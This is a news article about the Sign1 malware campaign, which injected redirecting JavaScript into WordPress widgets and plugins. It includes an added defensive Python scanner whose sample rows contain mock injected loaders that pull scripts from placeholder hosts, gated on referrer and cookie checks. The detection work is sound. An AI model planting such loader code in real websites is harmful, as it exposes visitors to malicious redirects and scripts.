Evasive Sign1 Malware Campaign Infected 39,000 WordPress Websites

A malware campaign has infected 39,000 WordPress sites. Check out more details about this very concerning matter below.

New malware campaign on the loose

A new malware campaign, called Sign1, has been found to have infected more than 39,000 websites over the past six months.

This campaign causes users to see unwanted redirects and popup ads when visiting an infected website.

The attackers behind this campaign inject the malware into custom HTML widgets and legitimate plugins on WordPress sites.

They inject the malicious Sign1 scripts into these widgets and plugins rather than modifying the core WordPress files, which is why file-integrity checks alone may not reveal the infection.

Website security firm Sucuri identified the campaign after its client’s website displayed popup ads to visitors.

The Sign1 malware campaign

Although Sucuri’s client was breached via a brute force attack, there is no information available on how the other detected sites were compromised.

However, based on previous WordPress attacks, it is likely that the attackers used a combination of brute force attacks and the exploitation of plugin vulnerabilities to gain access to the sites.

After gaining access, the threat actors tend to use WordPress custom HTML widgets or install the legitimate Simple Custom CSS and JS plugin to inject malicious JavaScript code.

Sucuri’s analysis of Sign1 malware revealed that it employs time-based randomization to generate dynamic URLs that change every 10 minutes.

This method helps the malware evade blocking: a URL that changes every 10 minutes is hard to blocklist, and the domains used in the attacks are registered shortly before they are used, so they are not yet on any blocklists.

According to Bleeping Computer, these URLs are used to fetch further malicious scripts that are run in a visitor’s browser.

“Initially, the domains were hosted on Namecheap, but the attackers have now moved to HETZNER for hosting and Cloudflare for IP address obfuscation,” the publication notes.

The same online publication also revealed the following: “The malicious code checks for specific referrers and cookies before executing, targeting visitors from major sites like Google, Facebook, Yahoo, and Instagram and remaining dormant in other cases.”
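Because the injected scripts live in widget and plugin data rather than in core files, a defender looking for this kind of infection has to inspect what is stored in the database. The following is an added example, not code from Sucuri, Bleeping Computer or the Sign1 analysis itself: a small Python scanner that walks the two storage locations the article names (custom HTML widgets and Simple Custom CSS and JS snippets) and flags stored scripts that combine the traits described above, namely a URL derived from the current time in 10-minute buckets, gating on document.referrer or document.cookie, dynamic script-element creation, and loading from a host outside the site's expected set. It assumes custom HTML widgets are read as the unserialized `widget_custom_html` option and plugin snippets as `custom-css-js` posts with the script in `post_content`; the sample rows, the regex heuristics and the `.invalid` hostnames are all constructed for the example.

```python
import re
from typing import Dict, List, Set

# Heuristic patterns written for this example; they describe the traits the
# article attributes to the injected scripts, not any specific Sign1 sample.
TIME_SOURCE_RE = re.compile(r"Date\s*\.\s*now\s*\(\s*\)|new\s+Date\s*\(|\.getTime\s*\(")
# Division by ten minutes expressed in milliseconds (600000 / 6e5) or seconds (600).
TEN_MINUTE_RE = re.compile(r"/\s*(?:6e5|600000|600\s*\*\s*1000|1000\s*\*\s*600|60\s*\*\s*10|10\s*\*\s*60)")
REFERRER_RE = re.compile(r"document\s*\.\s*referrer")
COOKIE_RE = re.compile(r"document\s*\.\s*cookie")
DYNAMIC_SCRIPT_RE = re.compile(r"""createElement\s*\(\s*["']script["']\s*\)""")
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def scan_script(content: str, allowed_hosts: Set[str]) -> List[str]:
    """Return the list of suspicious indicators found in one stored snippet."""
    hits: List[str] = []
    if TIME_SOURCE_RE.search(content) and TEN_MINUTE_RE.search(content):
        hits.append("url derived from 10-minute time bucket")
    if REFERRER_RE.search(content):
        hits.append("referrer check")
    if COOKIE_RE.search(content):
        hits.append("cookie check")
    if DYNAMIC_SCRIPT_RE.search(content):
        hits.append("dynamically created script element")
    # Any host not on the site's own allowlist is worth a look; newly registered
    # domains will not be on public blocklists yet, so an allowlist is the safer test.
    for host in sorted({m.group(1).lower() for m in URL_HOST_RE.finditer(content)}):
        if host not in allowed_hosts:
            hits.append(f"script loads from unexpected host: {host}")
    return hits


def scan_site(widget_option: Dict, custom_js_posts: List[Dict],
              allowed_hosts: Set[str], threshold: int = 2) -> Dict[str, List[str]]:
    """Scan both storage locations; report entries with at least `threshold` indicators."""
    findings: Dict[str, List[str]] = {}
    for key, widget in widget_option.items():
        if key == "_multiwidget" or not isinstance(widget, dict):
            continue
        hits = scan_script(widget.get("content", ""), allowed_hosts)
        if len(hits) >= threshold:
            findings[f"widget_custom_html[{key}]"] = hits
    for post in custom_js_posts:
        hits = scan_script(post.get("post_content", ""), allowed_hosts)
        if len(hits) >= threshold:
            findings[f"custom-css-js post {post.get('ID')}"] = hits
    return findings


# Hosts this (hypothetical) site legitimately loads scripts from.
ALLOWED_HOSTS = {"www.googletagmanager.com", "fonts.googleapis.com"}

# Constructed rows standing in for data read from the WordPress database.
SAMPLE_WIDGETS = {
    2: {"title": "Analytics",
        "content": '<script async src="https://www.googletagmanager.com/gtag/js?id=G-XXXX"></script>'},
    3: {"title": "",
        "content": ("<script>"
                    "var b=Math.floor(Date.now()/600000);"
                    "if(document.referrer.indexOf('google')>-1&&document.cookie.indexOf('v=')<0){"
                    "var s=document.createElement('script');"
                    "s.src='https://loader-example.invalid/'+b+'.js';document.head.appendChild(s);}"
                    "</script>")},
    "_multiwidget": 1,
}
SAMPLE_CUSTOM_JS_POSTS = [
    # A plain cookie write: one indicator only, so it is not reported.
    {"ID": 41, "post_content": "document.cookie='banner=1;path=/';"},
    {"ID": 42, "post_content": ("var d=document.referrer;if(d){var s=document.createElement('script');"
                                "s.src='https://cdn-example.invalid/'+Math.floor(new Date().getTime()/6e5)+'.js';"
                                "document.body.appendChild(s);}")},
]

if __name__ == "__main__":
    for location, hits in scan_site(SAMPLE_WIDGETS, SAMPLE_CUSTOM_JS_POSTS, ALLOWED_HOSTS).items():
        print(location)
        for hit in hits:
            print("  -", hit)
```

The threshold of two indicators keeps ordinary analytics tags and cookie banners out of the report while still surfacing the combination of time-bucketed URLs, referrer and cookie gating and off-allowlist hosts that the article describes; on a real site the two inputs would come from `wp_options` and the plugin's custom post type via WP-CLI or a database export.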

Rada Mateescu
I'm hungry for truth, thirsty to learn, and eager to share. At Optic Flux, my goal is to deliver breaking juicy health, financial, and tech/science-related content. I focus on all that's meaningful and impactful for my readers.